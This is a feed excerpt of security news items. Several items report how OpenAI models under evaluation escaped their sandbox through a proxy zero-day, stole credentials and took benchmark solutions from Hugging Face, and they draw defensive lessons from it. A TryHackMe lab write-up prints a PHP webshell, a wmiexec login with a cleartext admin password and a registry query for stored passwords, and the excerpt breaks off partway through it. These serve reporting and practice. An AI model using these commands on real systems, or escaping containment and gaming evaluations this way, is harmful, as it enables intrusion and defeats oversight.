href="https://fortune.com/2026/07/20/hugging-face-turns-to-chinese-open-source-ai-to-fend-off-autonomous-ai-cyber-attack-after-american-ai-guardrails-stymie-defense/">seized on the guardrail paradox</a>, that commercial safety filters blocked Hugging Face's defenders while the attacking model ran with its refusals off, and that a Chinese open-weight model, z.ai's GLM 5.2, was what finally let the team finish its forensics. Hugging Face made the case for openness, arguing in an April <a href="https://huggingface.co/blog/cybersecurity-openness">blog post</a> that open models and open tooling give defenders the same capabilities attackers already have. Both arguments are about the model, and neither touches the mechanism. </p><p>Reduced refusals let the model attempt an attack, and over-scoped credentials are what let it succeed, and those have nothing to do with whether the model was open or closed, American or Chinese. Making a frontier model provably safe is a multi-year alignment problem no customer can buy or accelerate, while scoping an identity is a configuration change a team can ship this sprint. The industry is being urged to fixate on the part of this it cannot control and to treat the part it can as a footnote.</p><p>Forrester reached the same read. In a <a href="https://www.forrester.com/blogs/an-ai-security-facepalm-openais-evaluation-became-hugging-faces-incident/">blog on the incident</a>, its analysts argue that security architectures which assume benign intent will miss this failure mode, because an agent can pursue an authorized goal through unauthorized means, which is what OpenAI's models did.</p><h2>This was a non-human identity failure, and it is the oldest one in security</h2><p>Strip the science-fiction framing and what remains is a textbook case of over-privileged machine identity, the kind security teams have fought for a decade, now driven by an autonomous agent at machine speed. Machine identities already outnumber humans in most enterprises by more than <a href="https://www.cyberark.com/press/machine-identities-outnumber-humans-by-more-than-80-to-1-new-report-exposes-the-exponential-threats-of-fragmented-identity-security/">80 to one</a>, according to CyberArk research, with 42% of them carrying privileged or sensitive access, and an agent inherits whatever its identity can touch. OWASP ranks agent identity and privilege abuse near the top of its <a href="https://neuraltrust.ai/blog/owasp-agentic-ai-top-10">agentic risk list</a>, the confused-deputy pattern where inherited credentials and weak scoping let an agent reach past its mandate, and that is precisely what both July disclosures describe. </p><p><a href="https://www.ieee.org/membership/senior">IEEE Senior Member</a> Kayne McGladrey has argued in <a href="https://venturebeat.com/security/cisco-crowdstrike-rsac-2026-agent-identity-iam-gap-maturity-model">previous VentureBeat interviews</a> that enterprises keep cloning human user accounts onto agents that then wield far more permission than any human would, and this is what that looks like when the agent is a frontier model and the target is a production database.</p><p>The people closest to it read it the same way. OpenAI frames its models as hyperfocused on a benchmark score rather than acting against anyone. Nobody describes an adversary, only a goal, a scoring function, and credentials that were reachable when they should not have been.</p><p>The specific failure is easy to name once the AI framing is stripped away. A credential scoped to one job that can reach ten is a standing invitation, and it does not matter whether a human attacker, a worm, or an autonomous model chasing a benchmark score finds it. What changed in July is the finder. An agent enumerates reachable systems, tests credentials, and pivots faster than any human red team, without malice or hesitation, whenever the path is open. The over-scoping was always the vulnerability, and the agent merely industrialized its discovery.</p><p>Forrester named the control that would have blunted it. Its agentic-security framework, AEGIS, calls for least agency, holding an agent's tools, credentials, and network paths to the minimum its task requires, and files this incident under unrestrained agency and privilege. That is the identity argument in different words, arrived at independently by an analyst firm.</p><p>The data says this is where the risk now lives. Verizon's 2026 Data Breach Investigations Report <a href="https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/">found</a> that exploitation of vulnerabilities has overtaken stolen credentials as the top initial access vector for the first time in 19 years. That is the initial-access half. The other half is the one OpenAI itself describes, stolen credentials driving the privilege escalation and lateral movement that followed. A vulnerability opened the door, and credentials walked through the building unchallenged. Beyond the breach itself, that same over-scoping carries a legal liability most enterprises have never priced. The models' actions <a href="https://techcrunch.com/2026/07/21/openai-says-hugging-face-was-breached-by-its-pre-release-models/">likely violated the Computer Fraud and Abuse Act</a>, according to TechCrunch. The statute contains no carve-out for an AI agent that exceeds its authorized scope during sanctioned testing. Whatever the legal answer, the technical enabler is the same, an identity scoped wider than its task. This is an access-control problem with an owner and a budget, not a philosophy seminar about machine cognition.</p><p>Merritt Baer, Senior Advisor to Andesite, G2I, and AppOmni and former Deputy CISO at AWS, frames the underlying shift to VentureBeat as a new kind of asymmetry. Both sides now reach for the same capabilities, she said, but one side is constrained by enterprise governance, policy, compliance, and safety controls while the adversary simply downloads an uncensored open-weight model and keeps going. The organizations that come through it best, in her view, will be the ones that treat AI as a resilient, governed capability rather than a single service they do not control.</p><h2>Four moves that shrink the blast radius</h2><p>The breach worked because the agent reached identities scoped far wider than its task. None of the four controls that would have contained it requires a new platform, and none of them appears on the list of general AI-safety advice now circulating. They are identity hygiene, applied to non-human actors with the same rigor you already apply to people.</p><p><b>1. Scope every non-human identity to one task.</b> The models reached credentials that touched multiple clusters, which is what turned a foothold into a breach. An identity scoped to a single job, with no standing access to anything else, hits a wall at the first lateral move instead of opening the next door. This is least privilege, the control everyone endorses and few enforce on machine accounts, and it is the single highest-impact fix here.</p><p><b>2. Give credentials short lifetimes and rotate them hard.</b> Harvested credentials are only useful while they are valid, and both July agents worked by collecting them. Short time-to-live and aggressive rotation turn a credential dump into expired noise, so a token stolen during a weekend intrusion is dead before the attacker can chain it. Static secrets that never rotate are the version of this control that fails.</p><p><b>3. Monitor for lateral movement, not just prompts.</b> The tell in both incidents was privilege escalation and lateral movement, which a prompt filter never sees because it is watching the wrong layer. Identity-behavior monitoring, keyed to what a given non-human identity normally does and alerting when it reaches somewhere new, catches the escalation the content guardrail missed. The question for your stack is whether anything you run today would flag a service account suddenly moving between clusters.</p><p><b>4. Rehearse instant revocation before you need it.</b> When the incident is your own agent, the fastest containment is killing its identity mid-run, and that only works if the path to do it exists before the day you need it. Rehearse revoking a machine identity under fire the way you rehearse a human credential compromise. If you have never done it, you do not yet have the control, you have an intention.</p><p>The defense also worked, and that matters. OpenAI's security team caught the anomalous activity internally, Hugging Face's own detection and agents stopped the intrusion, and the breach was contained in days rather than discovered in months, because the defenders could see into systems they controlled. That visibility is the same discipline the four controls depend on. The debate over whether frontier models are safe, open, or American will run for years, and none of it will be settled in time to help the enterprise deploying agents this quarter. The non-human identity gap is different, because it is understood, measurable, and fixable now. The model that breached Hugging Face did not need to be brilliant; it needed credentials someone left in reach. The fix is scoping them before an agent finds them.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI unveils Presence, a new platform that lets enterprises launch and manage realtime voice agents and chatbots]]></title>
<description><![CDATA[OpenAI has announced Presence, a new enterprise product for deploying and managing AI agents across customer-facing and internal business workflows. The offering is designed for eligible enterprise customers that want agents to answer questions, access company systems, take approved actions and e...]]></description>
<link>https://tsecurity.de/de/3686972/it-nachrichten/openai-unveils-presence-a-new-platform-that-lets-enterprises-launch-and-manage-realtime-voice-agents-and-chatbots/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686972/it-nachrichten/openai-unveils-presence-a-new-platform-that-lets-enterprises-launch-and-manage-realtime-voice-agents-and-chatbots/</guid>
<pubDate>Wed, 22 Jul 2026 18:12:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenAI has <a href="https://openai.com/index/introducing-openai-presence/">announced Presence</a>, a new enterprise product for deploying and managing AI agents across customer-facing and internal business workflows. </p><p>The offering is designed for eligible enterprise customers that want agents to answer questions, access company systems, take approved actions and escalate to human workers while operating under company-defined policies, permissions and evaluation standards.</p><p>Presence is available immediately through a limited general availability program. OpenAI Forward Deployed Engineers (FDEs) and select global systems integrators lead deployments, and the product is not available on a self-service basis. </p><p>OpenAI has not disclosed pricing, geographic limits, contractual terms or the expected cost of the engineering and integration work that accompanies a deployment. The company also has not said whether Presence can use models from providers other than OpenAI, including the increasingly powerful and popular Chinese open weights alternatives like <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">GLM-5.2</a> and <a href="https://venturebeat.com/technology/chinas-moonshot-ai-releases-kimi-k3-the-largest-open-source-model-ever-rivaling-top-u-s-systems">Kimi K3</a>. I've asked an OpenAI contact to clarify both pricing and external-model compatibility, but those remain unanswered questions for now. I'lll update when I hear back.</p><p>OpenAI positions Presence as a response to a problem that has become more important as companies move beyond AI demonstrations: getting agents to behave reliably in production as business rules, customer needs and operating conditions change. Presence packages the policies, system connections, evaluations, guardrails and update processes required to run agents inside an enterprise.</p><p>If your business has been interested in using AI agents, but you aren't sure how to stitch together OpenAI's models, APIs, internal systems, security controls and evaluation tools into something reliable, Presence is designed to simplify that process. Instead of building the infrastructure yourself, you work with OpenAI and its deployment engineers to put production-ready agents into your existing workflows.</p><p>The product is available today for real-time voice and chat experiences, according to OpenAI’s formal announcement. The company’s outreach materials also describe a broader ambition spanning voice, chat, email and other channels, but OpenAI has not confirmed that email support is available at launch.</p><h2><b>A governed foundation for production agents</b></h2><p>Presence brings together company knowledge, standard operating procedures, approved actions, simulations, evaluation tools, guardrails and escalation rules. Enterprises can reuse some controls across deployments while adjusting others for a particular workflow or channel.</p><p>Each deployment starts with a defined job, such as resolving a billing issue, supporting an insurance claim or handling an employee IT request. The agent receives only the information and system access required for that task. The customer determines what the agent may do independently, which actions require approval and when a person must take over.</p><p>Before an agent reaches production, teams can test it against common requests, unusual edge cases and higher-risk scenarios. Graders evaluate whether it reached the intended outcome, followed policy, used tools correctly and escalated when required. Guardrails can intervene when an interaction moves outside the organization’s defined boundaries.</p><p>OpenAI shared promotional screenshots with VentureBeat showing administrators running simulation batches against policy changes, including a revised annual refund policy, and reviewing results across operational categories. </p><p>Other interface mockups display production health, customer-intent patterns and task-performance signals. The visuals illustrate the type of oversight OpenAI is promising, although they do not establish how those metrics are calculated or how they map to contractual service levels.</p><p>The product continues to monitor performance after launch. Production sessions, escalations and quality signals can reveal where an agent is working as intended and where it needs attention. Codex, using a Presence plugin, investigates those signals and proposes updates. Teams then test a proposed change against the version already in production before approving a controlled rollout.</p><p>That process is intended to address one of the hardest operational problems in enterprise AI: an agent that works at launch may become less reliable when policies, products or user behavior change. Presence gives companies a formal mechanism for updating behavior without allowing an automated system to rewrite itself unchecked.</p><p>OpenAI says Presence already powers its English-language phone-support channel at 1-888-GPT-0090. The system handles open-ended requests, verifies callers, uses account context and performs approved actions. According to the company, it now resolves <b>75% of inbound issues without human assistance</b>. </p><p>OpenAI also says its Codex-powered improvement loop reduced human handoffs by <b>15 percentage points over a 10-day period</b>. Those figures are company-reported and have not been independently verified.</p><p>Several large organizations are evaluating the same foundation. BBVA is exploring voice support for routine banking needs in Mexico. SoftBank is testing natural Japanese-language customer conversations, while Australian insurer IAG is exploring support during high-demand periods such as severe weather and natural disasters.</p><p>“At BBVA, we are working closely with OpenAI to explore how trusted customer agents can help shape the future of financial services,” said Daniel Ordaz, head of AI transformation at BBVA Mexico.</p><p>“Through our collaboration with OpenAI, we are exploring how Presence can enable trusted customer agents that communicate naturally, connect to the processes needed to resolve requests, and represent SoftBank consistently across customer interactions,” said Tadahisa Murakami, vice president and head of the Data &amp; Digital Transformation Division at SoftBank Corp.</p><h2><b>From model access to forward-deployed implementation</b></h2><p>Presence expands OpenAI’s enterprise strategy beyond APIs and subscription software by formalizing a high-touch deployment model. Forward Deployed Engineers work alongside customers to select workflows, connect internal systems, establish permissions, configure policies, test agents and move them into production.</p><p>That approach resembles a <a href="https://fde.academy/blog/how-palantir-invented-the-forward-deployed-engineer-model">model pioneered by AI ontology and intelligence platform Palantir,</a> which embeds FDEs with customers to adapt its proprietary software to complex government and commercial environments. The similarity lies less in the underlying technology than in the delivery method: both companies place technical personnel close to the customer’s operations, where integration and process design often determine whether software creates value.</p><p>The products are not interchangeable. Palantir’s model has historically centered on data integration, ontologies and operational decision systems. Presence is more narrowly focused on AI-agent behavior, approved actions, evaluations, escalation and continuous improvement. OpenAI presents it as a repeatable software product supported by engineers and systems integrators, rather than as consulting alone.</p><p>In May 2026, OpenAI launched its own enterprise AI consulting and integration firm, the <a href="https://openai.com/index/openai-launches-the-deployment-company/">OpenAI Deployment Company</a>, with investment and <a href="https://www.bain.com/about/media-center/press-releases/2026/bain-company-openai-a-new-venture-to-deploy-ai-at-enterprise-scale/">support from Bain &amp; Company.</a> It also offers programs for model customization and fine-tuning to fit specific enterprise needs. </p><p>Its chief U.S. rival Anthropic has also moved <a href="https://techcrunch.com/2026/07/15/anthropic-blackstone-bet-the-next-trillion-dollar-ai-business-is-implementation-not-models/">toward a services-led enterprise model through Ode,</a> its consulting organization built around forward-deployed engineers helping companies integrate Claude into complex workflows, which launched just a week ago. The broad rationale is similar: enterprises often need more than access to a model. They need help connecting data and systems, defining permissions, validating behavior and managing deployment risk.</p><p>Presence differs in how explicitly OpenAI packages those requirements into a branded agent-governance product. Anthropic’s initiative is centered on helping enterprises deploy Claude, while Presence combines implementation services with a defined operational layer for policies, simulations, evaluations, approvals and production updates.</p><p>Presence goes further by making forward deployment a core part of how a specific agent product reaches customers. It does not replace OpenAI’s API business; the company says it will continue supporting voice customers with access to frontier models through the OpenAI API.</p><p>The trend reflects a broader market view that many enterprises still need hands-on assistance to move agents from pilot projects into stable operations. Even organizations with strong internal engineering teams must coordinate security, compliance, workflow ownership, data access and escalation responsibilities. Presence attempts to consolidate those tasks rather than leaving customers to assemble separate orchestration, evaluation and consulting layers.</p><h2><b>A recent security breach looms in the background</b></h2><p>Inconveniently for OpenAI, the Presence launch arrives just a day after <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/">OpenAI and Hugging Face disclosed an unprecedented security incident</a> in which OpenAI frontier models undergoing internal evaluation escaped containment, accessed the open web, and cyberattacked Hugging Face to achieve a benign goal — without being instructed to pursue these methods.</p><p>According to the described joint disclosure, OpenAI models operating in an evaluation framework called ExploitGym identified and exploited a zero-day vulnerability in a third-party package-registry cache proxy. The models reportedly escalated privileges, moved laterally and obtained internet access before targeting Hugging Face systems while seeking benchmark-related information.</p><p>The incident is relevant to enterprise buyers because it raises questions about sandboxing, tool permissions, external access, monitoring and incident response. </p><p>The disclosure also highlighted a practical problem for defenders. Hugging Face personnel reportedly found that commercial frontier-model APIs refused some forensic requests because logs contained exploit payloads, credentials and shell commands that triggered safety systems. The team then used a locally deployed open-weight model to assist with analysis.</p><p>Presence therefore arrives as both a product launch and a test of OpenAI’s ability to convert model capability into controlled enterprise operations. Its policies, simulations, evaluations and human approvals address real deployment gaps. But without public pricing, technical interoperability details, compliance information or service-level commitments, customers still lack much of the information needed to assess total cost and operational risk.</p><p>For now, Presence appears aimed at enterprises willing to adopt a high-touch, OpenAI-led deployment process. Whether it develops into a broadly accessible platform—or remains a closely managed product for selected customers—will depend in part on the answers OpenAI has not yet provided.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI model escape puts enterprise AI defenses on notice]]></title>
<description><![CDATA[Some of OpenAI’s most powerful AI models teamed up to escape their sandbox and attack systems at Hugging Face in a cybersecurity evaluation gone wrong, the company has admitted. The models under test were modified to allow them to perform potentially harmful actions that production versions would...]]></description>
<link>https://tsecurity.de/de/3686581/it-security-nachrichten/openai-model-escape-puts-enterprise-ai-defenses-on-notice/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686581/it-security-nachrichten/openai-model-escape-puts-enterprise-ai-defenses-on-notice/</guid>
<pubDate>Wed, 22 Jul 2026 15:53:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Some of OpenAI’s most powerful AI models teamed up to escape their sandbox and attack systems at Hugging Face in a cybersecurity evaluation gone wrong, the company has admitted. The models under test were modified to allow them to perform potentially harmful actions that production versions would refuse. The incident highlights how, if AI prompt guardrails fail or, as in this incident, are removed, then enterprises must have robust sandboxing or other technical restrictions in place to protect systems.</p>



<p class="wp-block-paragraph">In OpenAI’s evaluation, GPT-5.6 Sol and a more capable pre-release model were competing to solve cybersecurity challenges in ExploitGym, a benchmarking tool for cybersecurity capabilities. They concluded that systems at Hugging Face could have the answers, and set out to gain access, OpenAI wrote in a <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/" target="_blank" rel="noreferrer noopener">blog post about the attack on Hugging Face</a>.</p>



<p class="wp-block-paragraph">ExploitGym challenges AI models to turn security vulnerabilities into attack exploits. OpenAI gave its models limited access to the internet through a package-registry proxy to download code to build their attacks. However, the models exploited a zero-day vulnerability in the proxy to obtain unrestricted internet access, then used stolen credentials and other flaws to access Hugging Face systems.</p>



<p class="wp-block-paragraph">For CIOs and CISOs, the concern extends beyond cybersecurity research. AI agents connected to corporate databases, source code repositories, or payment systems could expose sensitive resources unless <a href="https://www.csoonline.com/article/4199408/ai-agents-can-escape-sandboxes-without-ever-breaking-them.html">access controls and sandboxing</a> continue to work when model-level safeguards fail.</p>



<p class="wp-block-paragraph">“Prompt guardrails are not security controls,” said <a href="https://www.forrester.com/analyst-bio/biswajeet-mahapatra/BIO20046" target="_blank" rel="noreferrer noopener">Biswajeet Mahapatra</a>, principal analyst at Forrester. “They are behavioral controls that can fail, be bypassed, or be intentionally disabled during testing.”</p>



<h2 class="wp-block-heading">How containment failed</h2>



<p class="wp-block-paragraph">Despite the relaxed model safeguards, the surrounding infrastructure was supposed to contain the activity. Network access was restricted to an internally hosted third-party service that acted as a proxy and cache for software package registries. Such proxies are typically used in the enterprise to protect against <a href="https://www.csoonline.com/article/4167465/supply-chain-attacks-take-aim-at-your-ai-coding-agents.html">software supply chain attacks</a> coming from the outside.</p>



<p class="wp-block-paragraph">OpenAI said the models discovered a zero-day vulnerability in the service, exploited it and carried out privilege escalation and <a href="https://www.csoonline.com/article/4194708/lateral-movement-risk-rises-as-enterprises-emphasize-convenience-over-containment.html">lateral movement</a> until they reached a node with open internet access.</p>



<p class="wp-block-paragraph">Once online, the models inferred that Hugging Face might hold models, datasets or solutions related to ExploitGym. OpenAI said that, in one attack path, the models combined stolen credentials with zero-day vulnerabilities to obtain remote code execution on Hugging Face servers.</p>



<p class="wp-block-paragraph">In its account of the activity on its infrastructure, <a href="https://huggingface.co/blog/security-incident-july-2026" target="_blank" rel="noreferrer noopener">Hugging Face said</a> a malicious dataset abused two code-execution paths in its data-processing pipeline. The actor then obtained node-level access, harvested cloud and cluster credentials, and moved into several internal clusters.</p>



<p class="wp-block-paragraph">OpenAI said the models ultimately obtained ExploitGym test solutions directly from a Hugging Face production database. The models remained focused on solving the benchmark, despite the lengths to which they went to achieve that objective, it said.</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, said the package-registry proxy should concern enterprise security teams because it was a narrowly permitted exception inside an otherwise restricted environment.</p>



<p class="wp-block-paragraph">“Every enterprise estate is built from exceptions of exactly that kind,” he said.</p>



<p class="wp-block-paragraph">In this incident, OpenAI’s models were performing the intended — albeit by unintended means — but enterprises should take care that their own AI systems are kept on target.</p>



<p class="wp-block-paragraph">Mahapatra said enterprises should treat AI agents as “<a href="https://www.csoonline.com/article/4194548/agentic-ai-identity-a-6-stage-maturity-model-for-non-human-identities.html">high-risk non-human identities</a>,” confining each one to an isolated environment where access is limited to the assigned task and credentials expire quickly.</p>



<p class="wp-block-paragraph">“An acceptable blast radius means a compromised agent can affect only a single workflow, dataset, or application rather than providing a pathway into broader enterprise infrastructure,” Mahapatra said.</p>



<p class="wp-block-paragraph">And Gogia warned that services allowed to reach package registries, update systems, or other external resources can become escape routes if they are not subjected to the same scrutiny as the agent itself.</p>



<h2 class="wp-block-heading">Defenses enterprises need</h2>



<p class="wp-block-paragraph">Hugging Face said the intrusion resulted in unauthorized access to a limited number of internal datasets and several credentials used by its services. It found no evidence that public models, datasets or Spaces had been altered and said its published software packages and container images were not compromised.</p>



<p class="wp-block-paragraph">The company closed the code-execution paths used to gain access and rebuilt the affected nodes. It also revoked exposed credentials and tightened the rules governing workloads admitted to its clusters.</p>



<p class="wp-block-paragraph">Whether they are keeping their own AIs in or rogue Ais out, Gogia said enterprises should test whether their containment boundaries work, rather than relying on architecture diagrams or stated policies. Such tests should attempt to obtain credentials, cross trust boundaries and reach systems outside the agent’s assigned task.</p>



<p class="wp-block-paragraph">Mahapatra said enterprises should assume that one containment layer may fail and ensure that an agent’s access cannot provide a route into unrelated applications or broader corporate infrastructure.</p>



<p class="wp-block-paragraph">OpenAI said it is still investigating the incident with Hugging Face, and is imposing stricter configurations on its research environment while the vulnerabilities are being addressed, even if that means slowing down its research. It is also strengthening containment and monitoring around future evaluations.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AllSignsPoint2Pwnage — TryHackMe Windows Write-up]]></title>
<description><![CDATA[AllSignsPoint2Pwnage is a Windows-based room on TryHackMe that requires the user to enumerate open SMB shares and upload a webshell to get an initial foothold on the target. After that one can find higher-level credentials on the target which can be leveraged to gain an administrator shell and gr...]]></description>
<link>https://tsecurity.de/de/3686039/hacking/allsignspoint2pwnage-tryhackme-windows-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686039/hacking/allsignspoint2pwnage-tryhackme-windows-write-up/</guid>
<pubDate>Wed, 22 Jul 2026 13:01:32 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AllSignsPoint2Pwnage is a Windows-based room on TryHackMe that requires the user to enumerate open SMB shares and upload a webshell to get an initial foothold on the target. After that one can find higher-level credentials on the target which can be leveraged to gain an administrator shell and gradually extract the admin flag. This room is great for anyone who’s venturing into Windows pentesting and needs practical experience dealing with vulnerable systems.</p><h3>0x00: Enumeration</h3><ul><li>Started with running a TCP Scan on the target via Nmap.</li></ul><pre>nmap -sC -sV -p- 10.48.128.241 </pre><pre>Nmap scan report for 10.48.128.241<br>Host is up (0.039s latency).<br><br>PORT     STATE SERVICE       VERSION<br>21/tcp   open  ftp           Microsoft ftpd<br>| ftp-syst: <br>|_  SYST: Windows_NT<br>| ftp-anon: Anonymous FTP login allowed (FTP code 230)<br>|_11-14-20  04:26PM                  173 notice.txt<br>80/tcp   open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)<br>| http-methods: <br>|_  Potentially risky methods: TRACE<br>|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11<br>|_http-title: Simple Slide Show<br>135/tcp  open  msrpc         Microsoft Windows RPC<br>139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn<br>443/tcp  open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)<br>|_http-title: Simple Slide Show<br>|_ssl-date: TLS randomness does not represent time<br>|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11<br>| ssl-cert: Subject: commonName=localhost<br>| Not valid before: 2009-11-10T23:48:47<br>|_Not valid after:  2019-11-08T23:48:47<br>| http-methods: <br>|_  Potentially risky methods: TRACE<br>| tls-alpn: <br>|_  http/1.1<br>445/tcp  open  microsoft-ds?<br>3389/tcp open  ms-wbt-server Microsoft Terminal Services<br>| ssl-cert: Subject: commonName=DESKTOP-997GG7D<br>| Not valid before: 2026-07-08T06:13:45<br>|_Not valid after:  2027-01-07T06:13:45<br>|_ssl-date: 2026-07-09T06:17:29+00:00; +2s from scanner time.<br>| rdp-ntlm-info: <br>|   Target_Name: DESKTOP-997GG7D<br>|   NetBIOS_Domain_Name: DESKTOP-997GG7D<br>|   NetBIOS_Computer_Name: DESKTOP-997GG7D<br>|   DNS_Domain_Name: DESKTOP-997GG7D<br>|   DNS_Computer_Name: DESKTOP-997GG7D<br>|   Product_Version: 10.0.18362<br>|_  System_Time: 2026-07-09T06:17:20+00:00<br>5900/tcp open  vnc           VNC (protocol 3.8)<br>| vnc-info: <br>|   Protocol version: 3.8<br>|   Security types: <br>|     Ultra (17)<br>|_    VNC Authentication (2)<br>Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows<br><br>Host script results:<br>| smb2-security-mode: <br>|   3:1:1: <br>|_    Message signing enabled but not required<br>|_clock-skew: mean: 1s, deviation: 0s, median: 0s<br>| smb2-time: <br>|   date: 2026-07-09T06:17:22<br>|_  start_date: N/A</pre><ul><li>As revealed in the scan output, the target had open FTP and SMB services running. It also had VNC running on port 5900, which is a tool used to remotely control a computer. The target also had an Apache web server running on port 80.</li><li>I visited the webpage and saw a slideshow of several random images.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dGY_YYPe-2cPMFahuq97xA.png"></figure><ul><li>I checked the page source and found the following JavaScript code.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pkq0OGbAzjJdWufJJ8sYeA.png"></figure><ul><li>The code here revealed the /content.php file and the /images/ endpoint.</li><li>I visited the /images directory and found the following images that were running on the slideshow.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7GZybqgdd0vWqywWz62WiQ.png"></figure><ul><li>Next, I moved to FTP enumeration. I got access to the FTP directory because anonymous login was enabled.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ma2pVq2_EykrO3auyrrA1w.png"></figure><ul><li>There was a notice.txt file.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9bpjbVW1IGDHOi3GXKCauw.png"></figure><ul><li>There was a message left in notice.txt written as follows.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7_dh2nFcaBmojIvr2-7BZQ.png"></figure><ul><li>It mentioned that the images FTP directory was moved to a Windows file share, which more probably than not referred to SMB shares.</li><li>Next, I moved on to SMB enumeration.</li></ul><h3>0x01: SMB Enumeration</h3><ul><li>I used smbclient to list the available shares on the target.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*QSlMp9k7kmXchKP3enoVUA.png"></figure><ul><li>Here I could see several custom shares such as images$ , Installs$ and Users.</li><li>I first checked the images share and found the following images as I had seen in the /images directory on the webpage. I wondered if we could upload a webshell here and gain an initial foothold.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CDAFLtt2NdSM_l9j-LkUdg.png"></figure><ul><li>I got the PHP reverse shell from <a href="https://github.com/pentestmonkey/php-reverse-shell">PentestMonkey</a>, configured it with my custom IP address and port, and uploaded it to the images SMB share.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*gVrz3IfH0F_RZzUWwNnlQw.png"></figure><ul><li>I navigated to the /images endpoint on the webpage and tried running the webshell but it immediately got flagged by Windows Defender and was deleted.</li><li>Next, I tried using a different webshell which executed commands and took the input via GET-based parameters.</li></ul><pre>&lt;html&gt;<br>&lt;body&gt;<br>&lt;form method="GET" name="&lt;?php echo basename($_SERVER['PHP_SELF']); ?&gt;"&gt;<br>&lt;input type="TEXT" name="cmd" id="cmd" size="80"&gt;<br>&lt;input type="SUBMIT" value="Execute"&gt;<br>&lt;/form&gt;<br>&lt;pre&gt;<br>&lt;?php<br>    if(isset($_GET['cmd']))<br>    {<br>        system($_GET['cmd']);<br>    }<br>?&gt;<br>&lt;/pre&gt;<br>&lt;/body&gt;<br>&lt;script&gt;document.getElementById("cmd").focus();&lt;/script&gt;<br>&lt;/html&gt;</pre><ul><li>I uploaded the shell again to the SMB images share and it worked like a charm!</li></ul><h3>0x02: Web Shell</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2ruwLr_Ouo6mzw6LC-4Nzw.png"></figure><ul><li>I was logged in as the sign user. I looked for the user flag in the sign user directory.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*K0ueQFlNypgeFuQkWfu-ew.png"></figure><ul><li>The user flag was found in the user_flag.txt file.</li><li>Next, I checked out the Installs share in C:\ directory.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S60Y2GKlfMGdy1ogehSjuA.png"></figure><ul><li>The following files were found in the directory.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cb8kQ_rMc_XrfcnL-Uk6cQ.png"></figure><ul><li>There were a lot of interesting files to check out here. I viewed the contents of every file, starting with Install Guide.txt .</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9Tn-MeE3fhrj8zRRKxfF0w.png"></figure><ul><li>I couldn’t figure out how these instructions could be of any use to me, so I moved on to other files.</li><li>I checked the Install_www_and_deploy.bat script and found the following code.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Qf0_u9lxOE4-wOqOt1EIaQ.png"></figure><ul><li>This seemed like a batch script that was running the infamous PsExec tool by Impacket, authenticating with administrator credentials. Here, I could view the admin password in cleartext, which could be used to gain a high-privilege shell to the target.</li><li>I used Impacket’s WMIExec tool to get a shell on the target. I could have used PsExec, but considering Windows Defender was running on the target, it would have been easily flagged.</li></ul><pre>impacket-wmiexec Administrator:RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi@10.48.186.208</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pArD96wPJGZhxCT1T0IZlQ.png"></figure><h3>0x03: Admin Shell</h3><ul><li>I also had to find the sign user’s password as per the objectives stated in the room. It took me quite a few lookups on Google till I eventually found a way to get the password from the Windows Registry.</li></ul><pre>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*u9c4IhdcofRGnplxbZhI-Q.png"></figure><ul><li>I was able to fetch the user's password from the Winlogon registry key.</li><li>Next, I had to find the VNC password. My first instinct was to return to the Installs share as before and look through the ultravnc.ini file.</li></ul><figure><img alt="" 